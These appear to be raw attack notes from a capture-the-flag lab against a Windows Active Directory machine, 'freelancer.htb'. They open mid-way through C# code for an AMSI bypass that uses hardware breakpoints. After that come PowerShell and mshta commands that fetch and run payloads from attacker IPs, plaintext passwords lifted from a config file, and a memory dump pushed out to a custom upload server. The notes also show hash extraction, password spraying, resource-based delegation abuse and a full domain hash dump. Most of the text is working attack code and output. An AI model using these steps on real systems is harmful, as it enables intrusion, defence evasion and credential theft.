public const Int32 EXIT_THREAD_DEBUG_EVENT = 4;
public const Int32 LOAD_DLL_DEBUG_EVENT = 6;
public const Int32 OUTPUT_DEBUG_STRING_EVENT = 8;
public const Int32 RIP_EVENT = 9;
public const Int32 UNLOAD_DLL_DEBUG_EVENT = 7;
public const UInt32 EXCEPTION_ACCESS_VIOLATION = 0xC0000005;
public const UInt32 EXCEPTION_BREAKPOINT = 0x80000003;
public const UInt32 EXCEPTION_DATATYPE_MISALIGNMENT = 0x80000002;
public const UInt32 EXCEPTION_SINGLE_STEP = 0x80000004;
public const UInt32 EXCEPTION_ARRAY_BOUNDS_EXCEEDED = 0xC000008C;
public const UInt32 EXCEPTION_INT_DIVIDE_BY_ZERO = 0xC0000094;
public const UInt32 DBG_CONTROL_C = 0x40010006;
public const UInt32 DEBUG_PROCESS = 0x00000001;
public const UInt32 CREATE_SUSPENDED = 0x00000004;
public const UInt32 CREATE_NEW_CONSOLE = 0x00000010;
public const Int32 AMSI_RESULT_CLEAN = 0;
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool SetThreadContext(IntPtr hThread, IntPtr lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetThreadContext(IntPtr hThread, IntPtr lpContext);
[DllImport("kernel32.dll", SetLastError = true)]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)]
public static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)] string lpFileName);
[DllImport("Kernel32.dll")]
public static extern IntPtr AddVectoredExceptionHandler(uint First, IntPtr Handler);
[Flags]
public enum CONTEXT64_FLAGS : uint
{
CONTEXT64_AMD64 = 0x100000,
CONTEXT64_CONTROL = CONTEXT64_AMD64 | 0x01,
CONTEXT64_INTEGER = CONTEXT64_AMD64 | 0x02,
CONTEXT64_SEGMENTS = CONTEXT64_AMD64 | 0x04,
CONTEXT64_FLOATING_POINT = CONTEXT64_AMD64 | 0x08,
CONTEXT64_DEBUG_REGISTERS = CONTEXT64_AMD64 | 0x10,
CONTEXT64_FULL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_FLOATING_POINT,
CONTEXT64_ALL = CONTEXT64_CONTROL | CONTEXT64_INTEGER | CONTEXT64_SEGMENTS | CONTEXT64_FLOATING_POINT | CONTEXT64_DEBUG_REGISTERS
}
[StructLayout(LayoutKind.Sequential)]
public struct M128A
{
public ulong High;
public long Low;
public override string ToString()
{
return string.Format("High:{0}, Low:{1}", this.High, this.Low);
}
}
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct XSAVE_FORMAT64
{
public ushort ControlWord;
public ushort StatusWord;
public byte TagWord;
public byte Reserved1;
public ushort ErrorOpcode;
public uint ErrorOffset;
public ushort ErrorSelector;
public ushort Reserved2;
public uint DataOffset;
public ushort DataSelector;
public ushort Reserved3;
public uint MxCsr;
public uint MxCsr_Mask;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
public M128A[] FloatRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
public M128A[] XmmRegisters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 96)]
public byte[] Reserved4;
}
[StructLayout(LayoutKind.Sequential, Pack = 16)]
public struct CONTEXT64
{
public ulong P1Home;
public ulong P2Home;
public ulong P3Home;
public ulong P4Home;
public ulong P5Home;
public ulong P6Home;
public CONTEXT64_FLAGS ContextFlags;
public uint MxCsr;
public ushort SegCs;
public ushort SegDs;
public ushort SegEs;
public ushort SegFs;
public ushort SegGs;
public ushort SegSs;
public uint EFlags;
public ulong Dr0;
public ulong Dr1;
public ulong Dr2;
public ulong Dr3;
public ulong Dr6;
public ulong Dr7;
public ulong Rax;
public ulong Rcx;
public ulong Rdx;
public ulong Rbx;
public ulong Rsp;
public ulong Rbp;
public ulong Rsi;
public ulong Rdi;
public ulong R8;
public ulong R9;
public ulong R10;
public ulong R11;
public ulong R12;
public ulong R13;
public ulong R14;
public ulong R15;
public ulong Rip;
public XSAVE_FORMAT64 DUMMYUNIONNAME;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 26)]
public M128A[] VectorRegister;
public ulong VectorControl;
public ulong DebugControl;
public ulong LastBranchToRip;
public ulong LastBranchFromRip;
public ulong LastExceptionToRip;
public ulong LastExceptionFromRip;
}
[StructLayout(LayoutKind.Sequential)]
public struct EXCEPTION_RECORD
{
public uint ExceptionCode;
public uint ExceptionFlags;
public IntPtr ExceptionRecord;
public IntPtr ExceptionAddress;
public uint NumberParameters;
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 15, ArraySubType = UnmanagedType.U4)] public uint[] ExceptionInformation;
}
[StructLayout(LayoutKind.Sequential)]
public struct EXCEPTION_POINTERS
{
public IntPtr pExceptionRecord;
public IntPtr pContextRecord;
}
}
}
"@
Add-Type -TypeDefinition $HWBP
[HWBP.Amsi]::Bypass()
(New-Object System.Net.WebClient).DownloadString('http://10.10.14.221/sliverphollow64.txt') | IEXGetting Shells
cme smb 10.10.14.219-u 'Administrator' -H f99529e42ee77dc4704c568ba9320a34 --local-auth -x "C:\Windows\System32\mshta.exe http://10.10.14.221/sliver64.hta"(New-Object System.Net.WebClient).DownloadString('http://10.10.14.219/amsi64.txt') | IEX
powershell%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadString(%27http://10.10.14.219:80/amsi64.txt%27)%22
powershell "IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.219:80/amsi64.txt')"
Enumeration
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-07-13 01:45:39Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49678/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49681/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
55297/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
Host Recon
C:\Users\sql_svc\Downloads\SQLEXPR-2019_x64_ENU
SQLSVCACCOUNT="FREELANCER\sql_svc"
SQLSVCPASSWORD="IL0v3ErenY3ager"
SQLSYSADMINACCOUNTS="FREELANCER\Administrator"
SECURITYMODE="SQL"
SAPWD="t3mp0r@ryS@PWD"
lkazanof lorra199 mikasaAckerman sql_svc sqlbackupoperator
[+] freelancer.htb\mikasaAckerman:IL0v3ErenY3ager
cme smb 10.10.11.5 -u mikasaAckerman -p 'IL0v3ErenY3ager'
make-token -d freelancer.htb -u mikasaAckerman -p IL0v3ErenY3ager -T LOGON_NETWORK
207c5f198107487b55f5997fd3b490e2
$SecPassword = ConvertTo-SecureString 'IL0v3ErenY3ager' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('FREELANCER\mikasaAckerman', $SecPassword)
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c whoami" -Credential $Cred
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c powershell.exe 'IEX (New-Object System.Net.WebClient).DownloadString(http://10.10.14.32:80/amsi64.txt)'" -Credential $Cred
# Convert the password to a secure string
$SecPassword = ConvertTo-SecureString 'IL0v3ErenY3ager' -AsPlainText -Force
# Create the PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('FREELANCER\mikasaAckerman', $SecPassword)
# Run the 'whoami' command to verify credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c whoami" -Credential $Cred
# Define the PowerShell command to be executed
$psCommand1 = "powershell.exe -ExecutionPolicy Bypass -Command `"IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.32:80/amsi64.txt')`""
# Run the PowerShell command using the specified credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c $psCommand" -Credential $Cred
# Convert the password to a secure string
$SecPassword = ConvertTo-SecureString 'IL0v3ErenY3ager' -AsPlainText -Force
# Create the PSCredential object
$Cred = New-Object System.Management.Automation.PSCredential('FREELANCER\mikasaAckerman', $SecPassword)
# Run the 'whoami' command to verify credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c whoami" -Credential $Cred
# Define the command to copy the file
$copyCommand = "copy C:\Users\mikasaAckerman\Desktop\MEMORY.7z C:\Windows\tasks\MEMORY.7z"
# Define the command to set permissions
$setPermsCommand = "icacls C:\Windows\tasks\MEMORY.7z /grant Everyone:F"
# Combine both commands into a single command
$psCommand = "powershell.exe -Command `"& { $copyCommand; $setPermsCommand }`""
$psCommand1 = "powershell.exe -ExecutionPolicy Bypass -Command `"IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14.32:80/amsi64.txt')`""
# Run the combined command using the specified credentials
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c $psCommand" -Credential $Cred
Start-Process -FilePath "C:\Windows\System32\cmd.exe" -ArgumentList "/c $psCommand1" -Credential $Cred
Custom Http server
import http.server
import os
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
def do_PUT(self):
path = self.translate_path(self.path)
length = int(self.headers['Content-Length'])
with open(path, 'wb') as f:
f.write(self.rfile.read(length))
self.send_response(201, "Created")
self.end_headers()
if __name__ == '__main__':
server_address = ('', 8080)
httpd = http.server.HTTPServer(server_address, CustomHTTPRequestHandler)
print("Serving HTTP on port 8080...")
httpd.serve_forever()
Invoke-WebRequest -Uri http://10.10.14.32:8080/Memory.7z -Method Put -InFile "C:\Windows\tasks\MEMORY.7z"
# Update package lists and install dependencies
sudo apt update
sudo apt install -y python3 python3-pip python3-venv git
# Clone the Volatility 3 repository
git clone https://github.com/volatilityfoundation/volatility3.git
# Navigate to the Volatility 3 directory
cd volatility3
# Create a virtual environment
python3 -m venv venv
# Activate the virtual environment
source venv/bin/activate
# Install required Python packages
pip install -r requirements.txt
# Verify the installation
python vol.py -h
python3 vol.py -f memory.dmp windows.cachedump.Cachedump
| Username | Hash |
|---|---|
| Administrator | 67a0c0f193abd932b55fb8916692c361 |
| lorra199 | 7ce808b78e75a5747135cf53dc6ac3b1 |
| liza.kazanof | ecd6e532224ccad2abcf2369ccb8b679 |
| Username | Hash |
|---|---|
| Administrator | 725180474a181356e53f4fe3dffac527 |
| Guest | 31d6cfe0d16ae931b73c59d7e0c089c0 |
| DefaultAccount | 31d6cfe0d16ae931b73c59d7e0c089c0 |
| WDAGUtilityAccount | 04fc56dd3ee3165e966ed04ea791d7a7 |
./memprocfs -device /home/jay/htb/memory.dmp -mount /home/jay/htb/memprocfs
secretsdump.py -sam /home/jay/htb/memprocfs/registry/hive_files/0xffffd3067d935000-SAM-MACHINE_SAM.reghive -system /home/jay/htb/memprocfs/registry/hive_files/0xffffd30679c46000-SYSTEM-MACHINE_SYSTEM.reghive -security /home/jay/htb/memprocfs/registry/hive_files/0xffffd3067d7f0000-SECURITY-MACHINE_SECURITY.reghive LOCALAdministrator:500:aad3b435b51404eeaad3b435b51404ee:725180474a181356e53f4fe3dffac527:::
PWN3D#l0rr@Armessa199
nxc smb 10.10.11.5 -u users3.txt -p passwords.txt --continue-on-success
[+] freelancer.htb\lorra199:PWN3D#l0rr@Armessa199
GenericWrite
nxc smb 10.10.11.5 -u lorra199 -p 'PWN3D#l0rr@Armessa199' -M add-computer -o Name="BADPC" PASSWORD="Password1"
rbcd.py -delegate-from BADPC$ -delegate-to DC$ -action 'write' 'freelancer.htb/lorra199:PWN3D#l0rr@Armessa199'
nxc smb 10.10.11.5 -u Administrator --use-kcache -X "(New-Object System.Net.WebClient).DownloadString('http://10.10.14.32/amsi64.txt') | IEX" --exec-method smbexec
nxc smb 10.10.11.5 -u Administrator --use-kcache -M ntdsutil
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
evil-winrm -i 10.10.11.5 -u Administrator -H 0039318f1e8274633445bce32ad1a290
20da004c7d65cc2239561420812daa35 ## root.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0039318f1e8274633445bce32ad1a290:::
NTDSUTIL 10.10.11.5 445 DC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
NTDSUTIL 10.10.11.5 445 DC DC$:1000:aad3b435b51404eeaad3b435b51404ee:89851d57d9c8cc8addb66c59b83a4379:::
NTDSUTIL 10.10.11.5 445 DC krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d238e0bfa17d575038efc070187a91c2:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\mikasaAckerman:1105:aad3b435b51404eeaad3b435b51404ee:e8d62c7d57e5d74267ab6feb2f662674:::
NTDSUTIL 10.10.11.5 445 DC sshd:1108:aad3b435b51404eeaad3b435b51404ee:c1e83616271e8e17d69391bdcd335ab4:::
NTDSUTIL 10.10.11.5 445 DC SQLBackupOperator:1112:aad3b435b51404eeaad3b435b51404ee:c4b746db703d1af5575b5c3d69f57bab:::
NTDSUTIL 10.10.11.5 445 DC sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL 10.10.11.5 445 DC DATACENTER-2019$:1115:aad3b435b51404eeaad3b435b51404ee:7a8b0efef4571ec55cc0b9f8cb73fdcf:::
NTDSUTIL 10.10.11.5 445 DC lorra199:1116:aad3b435b51404eeaad3b435b51404ee:67d4ae78a155aab3d4aa602da518c051:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\maya.artmes:1124:aad3b435b51404eeaad3b435b51404ee:22db50a324b9a34ea898a290c1284e25:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\michael.williams:1126:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\sdavis:1127:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\d.jones:1128:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\jen.brown:1129:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\taylor:1130:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\jmartinez:1131:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\olivia.garcia:1133:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\dthomas:1134:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\sophia.h:1135:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\Ethan.l:1138:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\wwalker:1141:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\jgreen:1142:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\evelyn.adams:1143:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\hking:1144:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\alex.hill:1145:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\samuel.turner:1146:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\ereed:1149:aad3b435b51404eeaad3b435b51404ee:933a86eb32b385398ce5a474ce083447:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\leon.sk:1151:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL 10.10.11.5 445 DC DATAC2-2022$:1155:aad3b435b51404eeaad3b435b51404ee:007a710c0581c63104dad1e477c794e8:::
NTDSUTIL 10.10.11.5 445 DC WS1-WIIN10$:1156:aad3b435b51404eeaad3b435b51404ee:57e57c6a3f0f8fff74e8ab524871616b:::
NTDSUTIL 10.10.11.5 445 DC WS2-WIN11$:1157:aad3b435b51404eeaad3b435b51404ee:bf5267ee6236c86a3596f72f2ddef2da:::
NTDSUTIL 10.10.11.5 445 DC WS3-WIN11$:1158:aad3b435b51404eeaad3b435b51404ee:732c190482eea7b5e6777d898e352225:::
NTDSUTIL 10.10.11.5 445 DC DC2$:1159:aad3b435b51404eeaad3b435b51404ee:e1018953ffa39b3818212aba3f736c0f:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\carol.poland:1160:aad3b435b51404eeaad3b435b51404ee:af7b9d0557964265115d018b5cff6f8a:::
NTDSUTIL 10.10.11.5 445 DC freelancer.htb\lkazanof:1162:aad3b435b51404eeaad3b435b51404ee:a26c33c2878b23df8b2da3d10e430a0f:::
NTDSUTIL 10.10.11.5 445 DC SETUPMACHINE$:8601:aad3b435b51404eeaad3b435b51404ee:f5912663ecf2c8cbda2a4218127d11fe:::
NTDSUTIL 10.10.11.5 445 DC BADPC$:11601:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::